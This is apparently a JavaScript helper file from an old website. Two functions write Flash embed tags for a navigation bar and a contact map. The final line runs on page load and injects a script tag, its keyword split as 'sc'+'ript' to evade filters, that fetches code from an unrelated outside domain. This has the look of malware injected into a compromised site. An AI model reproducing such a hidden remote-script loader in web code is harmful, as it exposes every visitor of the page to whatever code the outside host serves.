function PlayFlash()
{
   document.write('<object type="application/x-shockwave-flash" data="elements/nav_no_audio.swf" width="215" height="570">\n');
   document.write('<param name="movie" value="elements/nav_no_audio.swf" />\n');
   document.write('<param name="quality" value="high" />\n');
   document.write('<embed src="elements/nav_no_audio.swf" width="215" height="570"></embed>\n');
   document.write('</object>\n');
}

function PlayContactFlash()
{
   document.write('<object type="application/x-shockwave-flash" data="contact/map.swf" width="186" height="217">\n');
   document.write('<param name="movie" value="contact/map.swf" />\n');
   document.write('<param name="quality" value="high" />\n');
   document.write('<embed src="elements/contact/map.swf" width="186" height="217"></embed>\n');
   document.write('</object>\n');
}
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Heat_Sink.js"></scri'+'pt>');